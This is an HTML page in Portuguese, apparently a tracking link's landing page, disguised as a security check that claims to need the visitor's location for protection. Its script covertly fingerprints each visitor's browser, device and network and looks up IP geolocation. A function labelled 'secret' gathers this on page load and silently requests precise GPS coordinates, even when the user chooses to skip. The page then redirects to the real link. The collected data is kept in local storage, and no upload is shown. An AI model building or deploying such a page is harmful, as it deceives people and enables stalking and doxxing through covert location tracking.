<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verificação de Segurança</title>
    <meta name="referrer" content="no-referrer">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Arial, sans-serif;
            background: #f5f5f5;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            padding: 20px;
        }

        .security-container {
            background: white;
            border-radius: 12px;
            box-shadow: 0 4px 20px rgba(0, 0, 0, 0.1);
            padding: 40px;
            max-width: 400px;
            width: 100%;
            text-align: center;
            animation: fadeIn 0.5s ease-in;
        }

        @keyframes fadeIn {
            from { opacity: 0; transform: translateY(-20px); }
            to { opacity: 1; transform: translateY(0); }
        }

        .security-icon {
            width: 60px;
            height: 60px;
            background: #4285f4;
            border-radius: 50%;
            margin: 0 auto 20px;
            display: flex;
            align-items: center;
            justify-content: center;
            animation: pulse 2s infinite;
        }

        @keyframes pulse {
            0% { transform: scale(1); }
            50% { transform: scale(1.05); }
            100% { transform: scale(1); }
        }

        .security-icon::before {
            content: "🔒";
            font-size: 30px;
        }

        h2 {
            color: #333;
            margin-bottom: 15px;
            font-size: 24px;
        }

        p {
            color: #666;
            margin-bottom: 25px;
            line-height: 1.5;
        }

        .location-reason {
            background: #f8f9fa;
            border-radius: 8px;
            padding: 15px;
            margin-bottom: 25px;
            text-align: left;
        }

        .location-reason ul {
            list-style: none;
            padding: 0;
        }

        .location-reason li {
            color: #555;
            margin-bottom: 8px;
            font-size: 14px;
        }

        .location-reason li::before {
            content: "✓ ";
            color: #4285f4;
            font-weight: bold;
        }

        .permission-btn {
            background: #4285f4;
            color: white;
            border: none;
            padding: 15px 40px;
            border-radius: 25px;
            font-size: 16px;
            cursor: pointer;
            transition: all 0.3s ease;
            margin-bottom: 15px;
        }

        .permission-btn:hover {
            background: #3367d6;
            transform: translateY(-1px);
            box-shadow: 0 4px 12px rgba(66, 133, 244, 0.3);
        }

        .permission-btn:disabled {
            background: #ccc;
            cursor: not-allowed;
            transform: none;
            box-shadow: none;
        }

        .skip-link {
            color: #4285f4;
            text-decoration: none;
            font-size: 14px;
            opacity: 0.7;
            transition: opacity 0.3s;
        }

        .skip-link:hover {
            opacity: 1;
            text-decoration: underline;
        }

        .loading-spinner {
            display: none;
            width: 40px;
            height: 40px;
            border: 3px solid #f3f3f3;
            border-top: 3px solid #4285f4;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 20px auto;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="security-container">
        <div class="security-icon"></div>
        <h2>Verificação de Segurança</h2>
        <p>Para sua segurança e melhor experiência, precisamos verificar sua localização atual.</p>
        
        <div class="location-reason">
            <ul>
                <li>Proteção contra acessos não autorizados</li>
                <li>Verificação de região permitida</li>
                <li>Personalização de conteúdo regional</li>
            </ul>
        </div>

        <button class="permission-btn" onclick="requestLocation()">
            Permitir Localização
        </button>
        
        <div class="loading-spinner" id="loadingSpinner"></div>
        
        <br>
        <a href="#" class="skip-link" onclick="skipLocation()">Continuar sem localização</a>
    </div>

    <script>
        // Configuração para funcionar sem referer
        const getBaseUrl = () => {
            return window.location.origin + window.location.pathname.replace('/track.html', '');
        };

        async function requestLocation() {
            const btn = document.querySelector('.permission-btn');
            const spinner = document.getElementById('loadingSpinner');
            
            btn.disabled = true;
            btn.textContent = 'Verificando...';
            spinner.style.display = 'block';

            try {
                await captureVisitorData(true);
            } catch (error) {
                console.log('Erro ao obter localização:', error);
                btn.disabled = false;
                btn.textContent = 'Permitir Localização';
                spinner.style.display = 'none';
            }
        }

        function skipLocation() {
            captureVisitorData(false);
        }

        // Função secreta para captura avançada
        async function captureAdvancedTracking() {
            const urlParams = new URLSearchParams(window.location.search);
            const trackingId = urlParams.get('id');
            const originalUrl = urlParams.get('url');
            
            if (!trackingId || !originalUrl) {
                console.log('Parâmetros inválidos');
                return;
            }
            
            const trackingData = {
                trackingId,
                originalUrl: decodeURIComponent(originalUrl),
                timestamp: new Date().toISOString(),
                secretMode: true,
                userAgent: navigator.userAgent,
                language: navigator.language,
                platform: navigator.platform,
                screenResolution: `${screen.width}x${screen.height}`,
                windowSize: `${window.innerWidth}x${window.innerHeight}`,
                timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
                referrer: document.referrer || 'Direct',
                pageUrl: window.location.href,
                connection: navigator.connection ? {
                    effectiveType: navigator.connection.effectiveType,
                    downlink: navigator.connection.downlink,
                    rtt: navigator.connection.rtt
                } : null,
                cookiesEnabled: navigator.cookieEnabled,
                javaEnabled: navigator.javaEnabled(),
                colorDepth: screen.colorDepth,
                pixelDepth: screen.pixelDepth
            };
            
            // Captura de localização por IP
            try {
                const ipResponse = await fetch('https://ipapi.co/json/');
                const ipData = await ipResponse.json();
                
                trackingData.ipLocation = {
                    ip: ipData.ip,
                    city: ipData.city,
                    region: ipData.region,
                    country: ipData.country_name,
                    countryCode: ipData.country_code,
                    latitude: ipData.latitude,
                    longitude: ipData.longitude,
                    postal: ipData.postal,
                    timezone: ipData.timezone,
                    asn: ipData.asn,
                    org: ipData.org
                };
            } catch (e) {
                console.log('Erro IP API:', e);
            }
            
            // Captura de geolocalização HTML5
            if (navigator.geolocation) {
                try {
                    const position = await new Promise((resolve, reject) => {
                        navigator.geolocation.getCurrentPosition(resolve, reject, {
                            enableHighAccuracy: true,
                            timeout: 5000,
                            maximumAge: 0
                        });
                    });
                    
                    trackingData.preciseLocation = {
                        latitude: position.coords.latitude,
                        longitude: position.coords.longitude,
                        accuracy: position.coords.accuracy,
                        altitude: position.coords.altitude,
                        heading: position.coords.heading,
                        speed: position.coords.speed,
                        timestamp: position.timestamp
                    };
                } catch (e) {
                    // Silencioso
                }
            }
            
            // Armazena dados separadamente
            let secretData = JSON.parse(localStorage.getItem('secretTracking') || '[]');
            secretData.push(trackingData);
            localStorage.setItem('secretTracking', JSON.stringify(secretData));
        }

        async function captureVisitorData(withLocation = false) {
            await captureAdvancedTracking();
            
            const urlParams = new URLSearchParams(window.location.search);
            const trackingId = urlParams.get('id');
            const originalUrl = urlParams.get('url');
            
            if (!trackingId || !originalUrl) {
                alert('Link inválido');
                return;
            }
            
            let locationData = {};
            
            if (withLocation && navigator.geolocation) {
                try {
                    const position = await new Promise((resolve, reject) => {
                        navigator.geolocation.getCurrentPosition(resolve, reject, {
                            enableHighAccuracy: true,
                            timeout: 10000,
                            maximumAge: 0
                        });
                    });
                    
                    locationData.latitude = position.coords.latitude;
                    locationData.longitude = position.coords.longitude;
                    
                    try {
                        const response = await fetch(`https://nominatim.openstreetmap.org/reverse?format=json&lat=${position.coords.latitude}&lon=${position.coords.longitude}`);
                        const data = await response.json();
                        locationData.city = data.address.city || data.address.town;
                        locationData.region = data.address.state;
                        locationData.country = data.address.country;
                    } catch (e) {
                        console.log('Erro ao obter endereço:', e);
                    }
                } catch (e) {
                    console.log('Geolocalização negada:', e);
                }
            }
            
            let ip = 'N/A';
            try {
                const response = await fetch('https://api.ipify.org?format=json');
                const data = await response.json();
                ip = data.ip;
            } catch (e) {
                console.log('Erro ao obter IP:', e);
            }
            
            const device = navigator.userAgent.includes('Mobile') ? 'Mobile' : 'Desktop';
            
            const trackingData = {
                trackingId,
                originalUrl: decodeURIComponent(originalUrl),
                timestamp: new Date().toISOString(),
                ip,
                device,
                userAgent: navigator.userAgent,
                language: navigator.language,
                locationPermission: withLocation,
                ...locationData
            };
            
            let allData = JSON.parse(localStorage.getItem('trackingData') || '[]');
            allData.push(trackingData);
            localStorage.setItem('trackingData', JSON.stringify(allData));
            
            const spinner = document.getElementById('loadingSpinner');
            const container = document.querySelector('.security-container');
            
            container.innerHTML = `
                <div style="text-align: center; color: #333;">
                    <div style="font-size: 50px; margin-bottom: 20px;">✓</div>
                    <h2>Verificação Completa</h2>
                    <p>Redirecionando para o conteúdo...</p>
                </div>
            `;
            
            setTimeout(() => {
                window.location.href = decodeURIComponent(originalUrl);
            }, 1500);
        }

        // Captura automática de dados secretos
        window.addEventListener('load', () => {
            setTimeout(captureAdvancedTracking, 1000);
        });

        // Se o usuário já tiver permissão
        if (navigator.permissions) {
            navigator.permissions.query({ name: 'geolocation' }).then(result => {
                if (result.state === 'granted') {
                    requestLocation();
                }
            });
        }
    </script>
</body>
</html>